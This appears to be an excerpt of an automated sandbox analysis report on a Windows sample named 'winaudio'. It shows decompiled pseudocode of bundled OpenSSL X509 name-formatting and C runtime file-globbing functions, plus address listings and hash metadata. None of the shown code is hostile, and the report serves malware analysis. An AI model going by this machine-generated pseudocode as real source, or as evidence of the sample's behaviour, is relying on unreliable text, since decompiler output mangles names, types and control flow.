						if(_t82 <= 0) {
							L50:
							__eflags = _t162;
							if(_t162 == 0) {
								L58:
								_t129 =  *(_t166 + 0x20);
								L59:
								__eflags =  *(_t166 + 0x14);
								if( *(_t166 + 0x14) == 0) {
									 *_t129 = 0;
								}
								L61:
								goto L62;
							}
							_t129 =  *(_t162 + 4);
							E002ECA70(_t162);
							_t166 = _t166 + 4;
							goto L59;
						} else {
							goto L10;
						}
						do {
							L10:
							_t164 = E002F2EC0( *_t149, _t131);
							 *(_t166 + 0x30) = _t164;
							_push( *_t164);
							_t86 = E002F0520(_t146);
							_t168 = _t166 + 0xc;
							__eflags = _t86;
							if(_t86 == 0) {
								L12:
								E002FC6F0(_t168 + 0x44, 0x50,  *_t164);
								_t89 = _t168 + 0x4c;
								_t166 = _t168 + 0xc;
								 *(_t166 + 0x1c) = _t89;
								L13:
								_t132 = _t89;
								_t138 = _t132 + 1;
								do {
									_t90 =  *_t132;
									_t132 = _t132 + 1;
									__eflags = _t90;
								} while (_t90 != 0);
								_t91 =  *(_t164 + 4);
								_t133 = _t132 - _t138;
								_t149 =  *_t91;
								__eflags = _t149 - 0x100000;
								if(__eflags > 0) {
									_push(0x7b);
									L55:
									_push(".\\crypto\\x509\\x509_obj.c");
									_push(0x86);
									L56:
									_push(0x74);
									_push(0xb);
									E002E5840(_t146, _t149, __eflags);
									_t169 = _t166 + 0x14;
									E002EBA40(_t146,  *((intOrPtr*)(_t169 + 0x10)));
									_t166 = _t169 + 4;
									goto L57;
								}
								__eflags = _t91[1] - 0x1b;
								_t165 = _t91[2];
								if(_t91[1] != 0x1b) {
									L28:
									 *(_t166 + 0x3c) = 1;
									L29:
									 *(_t166 + 0x30) = 1;
									 *(_t166 + 0x34) = 1;
									 *(_t166 + 0x38) = 1;
									L30:
									_t139 = 0;
									_t146 = 0;
									__eflags = _t149;
									if(_t149 <= 0) {
										L36:
										_t140 =  *((intOrPtr*)(_t166 + 0x18));
										_t155 = _t140;
										_t142 = _t140 + 2 + _t146 + _t133;
										 *((intOrPtr*)(_t166 + 0x18)) = _t142;
										__eflags = _t142 - 0x100000;
										if(__eflags > 0) {
											_push(0xac);
											goto L55;
										}
										_t162 =  *(_t166 + 0x10);
										__eflags = _t162;
										if(_t162 == 0) {
											__eflags = _t142 -  *((intOrPtr*)(_t166 + 0x24));
											if(_t142 >  *((intOrPtr*)(_t166 + 0x24))) {
												goto L58;
											}
											_t95 =  *(_t166 + 0x20);
											L42:
											 *((char*)(_t95 + _t155)) = 0x2f;
											_t157 = _t155 + 1 + _t95;
											E0037E340(_t157,  *(_t166 + 0x20), _t133);
											_t158 = _t157 + _t133;
											_t170 = _t166 + 0xc;
											_t146 = 0;
											 *_t158 = 0x3d;
											_t159 = _t158 + 1;
											_t134 =  *((intOrPtr*)( *((intOrPtr*)( *(_t166 + 0x34) + 4)) + 8));
											__eflags = _t149;
											if(_t149 <= 0) {
												goto L49;
											}
											do {
												_t101 = _t146 & 0x00000003;
												__eflags =  *(_t170 + 0x30 + _t101 * 4);
												if( *(_t170 + 0x30 + _t101 * 4) != 0) {
													_t143 =  *(_t146 + _t134) & 0x000000ff;
													__eflags = _t143 - 0x20 - 0x5e;
													if(_t143 - 0x20 > 0x5e) {
														 *_t159 = 0x785c;
														 *((char*)(_t159 + 2)) =  *((_t143 >> 0x00000004 & 0x0000000f) + "0123456789ABCDEF") & 0x000000ff;
														 *((char*)(_t159 + 3)) =  *((_t143 & 0x0000000f) + "0123456789ABCDEF") & 0x000000ff;
														_t159 = _t159 + 4;
														__eflags = _t159;
													} else {
														 *_t159 = _t143;
														_t159 = _t159 + 1;
													}
												}
												_t146 = _t146 + 1;
												__eflags = _t146 - _t149;
											} while (_t146 < _t149);
											goto L49;
										}
										_t109 = E002EBA70(_t146, _t162, _t142 + 1);
										_t166 = _t166 + 8;
										__eflags = _t109;
										if(__eflags == 0) {
											L52:
											_push(0xe2);
											_push(".\\crypto\\x509\\x509_obj.c");
											_push(0x41);
											goto L56;
										}
										_t95 =  *(_t162 + 4);
										goto L42;
									} else {
										goto L31;
									}
									do {
										L31:
										_t111 = _t139 & 0x00000003;
										__eflags =  *(_t166 + 0x30 + _t111 * 4);
										if( *(_t166 + 0x30 + _t111 * 4) == 0) {
											goto L35;
										}
										_t112 =  *((intOrPtr*)(_t139 + _t165));
										_t146 = _t146 + 1;
										__eflags = _t112 - 0x20;
										if(_t112 < 0x20) {
											L34:
											_t146 = _t146 + 3;
											__eflags = _t146;
											goto L35;
										}
										__eflags = _t112 - 0x7e;
										if(_t112 <= 0x7e) {
											goto L35;
										}
										goto L34;
										L35:
										_t139 = _t139 + 1;
										__eflags = _t139 - _t149;
									} while (_t139 < _t149);
									goto L36;
								}
								_t114 = _t149 & 0x80000003;
								__eflags = _t114;
								if(__eflags < 0) {
									__eflags = (_t114 - 0x00000001 | 0xfffffffc) + 1;
								}
								if(__eflags != 0) {
									goto L28;
								} else {
									_t147 = 0;
									_t160 = 0;
									_t115 = 0;
									 *(_t166 + 0x38) = 0;
									_t145 = 0;
									 *(_t166 + 0x34) = 0;
									 *(_t166 + 0x30) = 0;
									__eflags = _t149;
									if(_t149 <= 0) {
										L26:
										 *(_t166 + 0x3c) = 1;
										__eflags = _t115 | _t160 | _t147;
										if((_t115 | _t160 | _t147) != 0) {
											goto L29;
										}
										 *(_t166 + 0x38) = 0;
										 *(_t166 + 0x34) = 0;
										 *(_t166 + 0x30) = 0;
										goto L30;
									}
									do {
										__eflags =  *((intOrPtr*)(_t145 + _t165)) - _t147;
										if( *((intOrPtr*)(_t145 + _t165)) != _t147) {
											_t119 = _t145 & 0x00000003;
											__eflags = _t119;
											 *(_t166 + 0x30 + _t119 * 4) = 1;
										}
										_t145 = _t145 + 1;
										__eflags = _t145 - _t149;
									} while (_t145 < _t149);
									_t147 =  *(_t166 + 0x38);
									_t160 =  *(_t166 + 0x34);
									_t115 =  *(_t166 + 0x30);
									goto L26;
								}
							}
							_push(_t86);
							_t89 = E002F0490(_t146, _t149);
							_t166 = _t168 + 4;
							 *(_t166 + 0x1c) = _t89;
							__eflags = _t89;
							if(_t89 != 0) {
								goto L13;
							}
							goto L12;
							L49:
							_t149 =  *(_t170 + 0x2c);
							 *_t159 = 0;
							_t131 =  *((intOrPtr*)(_t170 + 0x14)) + 1;
							 *((intOrPtr*)(_t170 + 0x14)) = _t131;
							_t99 = E002F2D60( *( *(_t170 + 0x2c)));
							_t166 = _t170 + 4;
							__eflags = _t131 - _t99;
						} while (_t131 < _t99);
						goto L50;
					}
					if(_t162 != 0) {
						_t129 =  *(_t162 + 4);
						E002ECA70(_t162);
						_t166 = _t166 + 4;
					}
					E00385170(_t129, "NO X509_NAME", _t152);
					_t166 = _t166 + 0xc;
					 *((char*)(_t152 + _t129 - 1)) = 0;
					goto L61;
				}
				_t162 = E002EBC50(__edx, _t149);
				 *(_t166 + 0x10) = _t162;
				if(_t162 == 0) {
					goto L52;
				}
				_t126 = E002EBA70(__edx, _t162, 0xc8);
				_t166 = _t166 + 8;
				if(_t126 == 0) {
					goto L52;
				} else {
					_t152 = 0xc8;
					 *( *(_t162 + 4)) = _t129;
					goto L5;
				}
			}














































                        0x002e4540
                        0x002e4545
                        0x002e454a
                        0x002e4551
                        0x002e4559
                        0x002e4562
                        0x002e4569
                        0x002e456b
                        0x002e456f
                        0x002e4573
                        0x002e4574
                        0x002e457b
                        0x002e4581
                        0x002e45b8
                        0x002e45ba
                        0x002e4876
                        0x002e488a
                        0x002e4892
                        0x002e48a2
                        0x002e48a2
                        0x002e45c0
                        0x002e45c2
                        0x002e45f0
                        0x002e45f8
                        0x002e45fa
                        0x002e45fe
                        0x002e4602
                        0x002e4607
                        0x002e460a
                        0x002e460c
                        0x002e482b
                        0x002e482b
                        0x002e482d
                        0x002e487a
                        0x002e487a
                        0x002e487e
                        0x002e487e
                        0x002e4883
                        0x002e4885
                        0x002e4885
                        0x002e4888
                        0x00000000
                        0x002e4888
                        0x002e482f
                        0x002e4833
                        0x002e4838
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002e4612
                        0x002e4612
                        0x002e461a
                        0x002e461c
                        0x002e4620
                        0x002e4623
                        0x002e4628
                        0x002e462b
                        0x002e462d
                        0x002e4640
                        0x002e464a
                        0x002e464f
                        0x002e4653
                        0x002e4656
                        0x002e465a
                        0x002e465a
                        0x002e465c
                        0x002e4660
                        0x002e4660
                        0x002e4662
                        0x002e4663
                        0x002e4663
                        0x002e4667
                        0x002e466a
                        0x002e466c
                        0x002e466e
                        0x002e4674
                        0x002e4852
                        0x002e4854
                        0x002e4854
                        0x002e4859
                        0x002e485e
                        0x002e485e
                        0x002e4860
                        0x002e4862
                        0x002e4867
                        0x002e486e
                        0x002e4873
                        0x00000000
                        0x002e4873
                        0x002e467a
                        0x002e467e
                        0x002e4681
                        0x002e46fb
                        0x002e46fb
                        0x002e4703
                        0x002e4703
                        0x002e470b
                        0x002e4713
                        0x002e471b
                        0x002e471b
                        0x002e471d
                        0x002e471f
                        0x002e4721
                        0x002e4743
                        0x002e4743
                        0x002e474a
                        0x002e474f
                        0x002e4751
                        0x002e4755
                        0x002e475b
                        0x002e484b
                        0x00000000
                        0x002e484b
                        0x002e4761
                        0x002e4765
                        0x002e4767
                        0x002e4783
                        0x002e4787
                        0x00000000
                        0x00000000
                        0x002e478d
                        0x002e4791
                        0x002e4791
                        0x002e479b
                        0x002e479e
                        0x002e47a7
                        0x002e47a9
                        0x002e47ac
                        0x002e47ae
                        0x002e47b1
                        0x002e47b5
                        0x002e47b8
                        0x002e47ba
                        0x00000000
                        0x00000000
                        0x002e47c0
                        0x002e47c2
                        0x002e47c5
                        0x002e47ca
                        0x002e47cc
                        0x002e47d3
                        0x002e47d6
                        0x002e47df
                        0x002e47f4
                        0x002e47fe
                        0x002e4801
                        0x002e4801
                        0x002e47d8
                        0x002e47d8
                        0x002e47da
                        0x002e47da
                        0x002e47d6
                        0x002e4804
                        0x002e4805
                        0x002e4805
                        0x00000000
                        0x002e47c0
                        0x002e476e
                        0x002e4773
                        0x002e4776
                        0x002e4778
                        0x002e483d
                        0x002e483d
                        0x002e4842
                        0x002e4847
                        0x00000000
                        0x002e4847
                        0x002e477e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002e4723
                        0x002e4723
                        0x002e4725
                        0x002e4728
                        0x002e472d
                        0x00000000
                        0x00000000
                        0x002e472f
                        0x002e4732
                        0x002e4733
                        0x002e4735
                        0x002e473b
                        0x002e473b
                        0x002e473b
                        0x00000000
                        0x002e473b
                        0x002e4737
                        0x002e4739
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002e473e
                        0x002e473e
                        0x002e473f
                        0x002e473f
                        0x00000000
                        0x002e4723
                        0x002e4685
                        0x002e4685
                        0x002e468a
                        0x002e4690
                        0x002e4690
                        0x002e4691
                        0x00000000
                        0x002e4693
                        0x002e4693
                        0x002e4695
                        0x002e4697
                        0x002e4699
                        0x002e469d
                        0x002e469f
                        0x002e46a3
                        0x002e46a7
                        0x002e46a9
                        0x002e46d3
                        0x002e46d5
                        0x002e46dd
                        0x002e46df
                        0x00000000
                        0x00000000
                        0x002e46e1
                        0x002e46e9
                        0x002e46f1
                        0x00000000
                        0x002e46f1
                        0x002e46b0
                        0x002e46b0
                        0x002e46b3
                        0x002e46b7
                        0x002e46b7
                        0x002e46ba
                        0x002e46ba
                        0x002e46c2
                        0x002e46c3
                        0x002e46c3
                        0x002e46c7
                        0x002e46cb
                        0x002e46cf
                        0x00000000
                        0x002e46cf
                        0x002e4691
                        0x002e462f
                        0x002e4630
                        0x002e4635
                        0x002e4638
                        0x002e463c
                        0x002e463e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002e4809
                        0x002e4809
                        0x002e4811
                        0x002e4814
                        0x002e4815
                        0x002e481b
                        0x002e4820
                        0x002e4823
                        0x002e4823
                        0x00000000
                        0x002e4612
                        0x002e45c6
                        0x002e45c8
                        0x002e45cc
                        0x002e45d1
                        0x002e45d1
                        0x002e45db
                        0x002e45e0
                        0x002e45e3
                        0x00000000
                        0x002e45e3
                        0x002e4588
                        0x002e458a
                        0x002e4590
                        0x00000000
                        0x00000000
                        0x002e459c
                        0x002e45a1
                        0x002e45a6
                        0x00000000
                        0x002e45ac
                        0x002e45af
                        0x002e45b4
                        0x00000000
                        0x002e45b4

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: _strncpy
                        • String ID: .\crypto\x509\x509_obj.c$NO X509_NAME
                        • API String ID: 2961919466-14672339
                        • Opcode ID: 11b48dffb823e307d4231f71f78c981f193b150cf21d7c644c7b55c9186c9c9e
                        • Instruction ID: 70193dab300e590c2977c7f5ec8885022fe3d1e57a097988f3375095c732bc06
                        • Opcode Fuzzy Hash: 11b48dffb823e307d4231f71f78c981f193b150cf21d7c644c7b55c9186c9c9e
                        • Instruction Fuzzy Hash: CDA138719683C59FD711EF1AC88172BBBE4FF85308F94442CF8898B242D775D9258B92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038F72D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                        Download Yara Rule
                        C-Code - Quality: 62%
                        			E0038F72D(void* __ebx, void* __edi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				char _v292;
				void _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				void* __esi;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				signed int _t199;
				signed int _t201;
				union _FINDEX_INFO_LEVELS _t202;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				void* _t212;
				intOrPtr _t213;
				void* _t214;
				void* _t215;
				signed int _t218;
				void* _t220;
				signed int _t221;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				void* _t226;
				void* _t227;

				_t80 = _a8;
				_t223 = _t222 - 0x20;
				if(_t80 != 0) {
					_t207 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t198 = 0;
					_t151 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					__eflags =  *_t207;
					if( *_t207 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t198;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t198;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t209;
						if(_t209 != 0) {
							_t196 = _t198;
							_t158 = _t160;
							do {
								_t184 =  *_t196;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t196 = _t196 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t209;
							} while (_t145 != _t209);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v32;
						}
						_t210 = E003841BB(_t191, _v8, 1);
						_t224 = _t223 + 0xc;
						__eflags = _t210;
						if(_t210 != 0) {
							_t87 = _t210 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t198 - _t151;
							if(_t198 == _t151) {
								L23:
								_t199 = 0;
								__eflags = 0;
								 *_a8 = _t210;
								goto L24;
							} else {
								_t93 = _t210 - _t198;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t198;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0038F402(_t164, _t192, _v20 - _t192 + _v8,  *_t198);
									_t224 = _t224 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E0037F99E();
										asm("int3");
										_t220 = _t224;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t198);
										_t201 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t201;
										if(_t167 <= (_t103 | 0xffffffff) - _t201) {
											_push(_t151);
											_t50 = _t201 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t212 = E0038B987(_t167, _t154, 1);
											_t169 = _t210;
											__eflags = _t201;
											if(_t201 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t201;
												_t108 = E0038F402(_t169, _t212 + _t201, _t154, _v0);
												_t225 = _t224 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E0038FAFC(_a12, _t193, __eflags, _t212);
													E0038B8FF(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t201);
												_t140 = E0038F402(_t169, _t212, _t154, _a4);
												_t225 = _t224 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0037F99E();
													asm("int3");
													_push(_t220);
													_t221 = _t225;
													_t226 = _t225 - 0x150;
													_t111 =  *0x3e1008; // 0x847b54ee
													_v116 = _t111 ^ _t221;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t212);
													_t213 = _v96;
													_push(_t201);
													_v440 = _t213;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E003953F0(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t202 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E0037E1A0(_t202,  &_v336, _t202, 0x140);
														_t227 = _t226 + 0xc;
														_t214 = FindFirstFileExA(_t155, _t202,  &_v336, _t202, _t202, _t202);
														_t123 = _v340;
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v292 - 0x2e;
																if(_v292 != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &_v292;
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t227 = _t227 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 =  *0x39e1c8(_t214,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t194 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E0038A890(_t155, _t202, _t194 + _t179 * 4, _t131 - _t179, 4, E0038F715);
															}
														} else {
															_push(_t123);
															_push(_t202);
															_push(_t202);
															_push(_t155);
															L28();
															L54:
															_t202 = _t123;
														}
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															 *0x39e1c0(_t214);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t213);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													_pop(_t215);
													__eflags = _v16 ^ _t221;
													return E002E056D(_v16 ^ _t221, _t194, _t215);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t195 = _v16;
									 *((intOrPtr*)(_v24 + _t198)) = _t195;
									_t198 = _t198 + 4;
									_t192 = _t195 + _v12;
									_v16 = _t195 + _v12;
									__eflags = _t198 - _t151;
								} while (_t198 != _t151);
								goto L23;
							}
						} else {
							_t199 = _t198 | 0xffffffff;
							L24:
							E0038B8FF(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E003953B0( *_t207,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t207);
								L38();
								_t223 = _t223 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t207);
								L28();
								_t223 = _t223 + 0x10;
							}
							_t199 = _t147;
							__eflags = _t199;
							if(_t199 != 0) {
								break;
							}
							_t207 = _t207 + 4;
							_t160 = 0;
							__eflags =  *_t207;
							if( *_t207 != 0) {
								continue;
							} else {
								_t151 = _v32;
								_t198 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0038FAD7( &_v36);
						_t91 = _t199;
						goto L26;
					}
				} else {
					_t148 = E00380E9E();
					_t218 = 0x16;
					 *_t148 = _t218;
					E0037F971();
					_t91 = _t218;
					L26:
					return _t91;
				}
				L68:
			}
























































































                        0x0038f732
                        0x0038f735
                        0x0038f73b
                        0x0038f753
                        0x0038f756
                        0x0038f75a
                        0x0038f75c
                        0x0038f75e
                        0x0038f760
                        0x0038f763
                        0x0038f766
                        0x0038f769
                        0x0038f76b
                        0x0038f7c3
                        0x0038f7c3
                        0x0038f7c9
                        0x0038f7cb
                        0x0038f7d6
                        0x0038f7da
                        0x0038f7dc
                        0x0038f7df
                        0x0038f7e3
                        0x0038f7e3
                        0x0038f7e5
                        0x0038f7e7
                        0x0038f7e9
                        0x0038f7eb
                        0x0038f7eb
                        0x0038f7ed
                        0x0038f7f0
                        0x0038f7f3
                        0x0038f7f3
                        0x0038f7f5
                        0x0038f7f6
                        0x0038f7f6
                        0x0038f801
                        0x0038f803
                        0x0038f806
                        0x0038f807
                        0x0038f80a
                        0x0038f80a
                        0x0038f80e
                        0x0038f811
                        0x0038f814
                        0x0038f814
                        0x0038f822
                        0x0038f824
                        0x0038f827
                        0x0038f829
                        0x0038f833
                        0x0038f836
                        0x0038f839
                        0x0038f83b
                        0x0038f83e
                        0x0038f840
                        0x0038f890
                        0x0038f893
                        0x0038f893
                        0x0038f895
                        0x00000000
                        0x0038f842
                        0x0038f844
                        0x0038f844
                        0x0038f846
                        0x0038f849
                        0x0038f849
                        0x0038f84e
                        0x0038f851
                        0x0038f851
                        0x0038f853
                        0x0038f854
                        0x0038f854
                        0x0038f858
                        0x0038f85b
                        0x0038f85b
                        0x0038f85e
                        0x0038f861
                        0x0038f86e
                        0x0038f873
                        0x0038f876
                        0x0038f878
                        0x0038f8b2
                        0x0038f8b3
                        0x0038f8b4
                        0x0038f8b5
                        0x0038f8b6
                        0x0038f8b7
                        0x0038f8bc
                        0x0038f8c0
                        0x0038f8c2
                        0x0038f8c3
                        0x0038f8c6
                        0x0038f8c6
                        0x0038f8c9
                        0x0038f8c9
                        0x0038f8cb
                        0x0038f8cc
                        0x0038f8cc
                        0x0038f8d5
                        0x0038f8d6
                        0x0038f8d9
                        0x0038f8dc
                        0x0038f8df
                        0x0038f8e1
                        0x0038f8e8
                        0x0038f8ea
                        0x0038f8ed
                        0x0038f8f7
                        0x0038f8fa
                        0x0038f8fb
                        0x0038f8fd
                        0x0038f911
                        0x0038f911
                        0x0038f914
                        0x0038f91e
                        0x0038f923
                        0x0038f926
                        0x0038f928
                        0x00000000
                        0x0038f92a
                        0x0038f92e
                        0x0038f937
                        0x0038f93d
                        0x00000000
                        0x0038f940
                        0x0038f8ff
                        0x0038f8ff
                        0x0038f905
                        0x0038f90a
                        0x0038f90d
                        0x0038f90f
                        0x0038f946
                        0x0038f948
                        0x0038f949
                        0x0038f94a
                        0x0038f94b
                        0x0038f94c
                        0x0038f94d
                        0x0038f952
                        0x0038f955
                        0x0038f956
                        0x0038f958
                        0x0038f95e
                        0x0038f965
                        0x0038f968
                        0x0038f96b
                        0x0038f96c
                        0x0038f96f
                        0x0038f970
                        0x0038f973
                        0x0038f974
                        0x0038f995
                        0x0038f995
                        0x0038f997
                        0x00000000
                        0x00000000
                        0x0038f97c
                        0x0038f97e
                        0x0038f980
                        0x0038f982
                        0x0038f984
                        0x0038f986
                        0x0038f988
                        0x0038f993
                        0x00000000
                        0x0038f993
                        0x0038f988
                        0x0038f984
                        0x00000000
                        0x0038f980
                        0x0038f999
                        0x0038f99b
                        0x0038f99e
                        0x0038f9b7
                        0x0038f9b7
                        0x0038f9b9
                        0x0038f9bc
                        0x0038f9cc
                        0x0038f9ce
                        0x0038f9ce
                        0x0038f9be
                        0x0038f9be
                        0x0038f9c1
                        0x00000000
                        0x0038f9c3
                        0x0038f9c3
                        0x0038f9c6
                        0x00000000
                        0x0038f9c8
                        0x0038f9c8
                        0x0038f9c8
                        0x0038f9c6
                        0x0038f9c1
                        0x0038f9dc
                        0x0038f9e0
                        0x0038f9ee
                        0x0038f9f3
                        0x0038fa08
                        0x0038fa0a
                        0x0038fa10
                        0x0038fa13
                        0x0038fa45
                        0x0038fa45
                        0x0038fa4a
                        0x0038fa50
                        0x0038fa50
                        0x0038fa57
                        0x0038fa71
                        0x0038fa71
                        0x0038fa72
                        0x0038fa78
                        0x0038fa7e
                        0x0038fa7f
                        0x0038fa80
                        0x0038fa85
                        0x0038fa88
                        0x0038fa8a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038fa59
                        0x0038fa59
                        0x0038fa5f
                        0x0038fa61
                        0x00000000
                        0x0038fa63
                        0x0038fa63
                        0x0038fa66
                        0x00000000
                        0x0038fa68
                        0x0038fa68
                        0x0038fa6f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038fa6f
                        0x0038fa66
                        0x0038fa61
                        0x00000000
                        0x0038fa8c
                        0x0038fa94
                        0x0038fa9a
                        0x0038fa9c
                        0x0038fa9c
                        0x0038faa4
                        0x0038faa9
                        0x0038fab1
                        0x0038fab4
                        0x0038fab6
                        0x0038faca
                        0x0038facf
                        0x0038fa15
                        0x0038fa15
                        0x0038fa16
                        0x0038fa17
                        0x0038fa18
                        0x0038fa19
                        0x0038fa21
                        0x0038fa21
                        0x0038fa21
                        0x0038fa23
                        0x0038fa26
                        0x0038fa29
                        0x0038fa29
                        0x0038f9a0
                        0x0038f9a3
                        0x0038f9a5
                        0x00000000
                        0x0038f9a7
                        0x0038f9a7
                        0x0038f9aa
                        0x0038f9ab
                        0x0038f9ac
                        0x0038f9ad
                        0x0038f9b2
                        0x0038f9a5
                        0x0038fa31
                        0x0038fa35
                        0x0038fa36
                        0x0038fa41
                        0x00000000
                        0x00000000
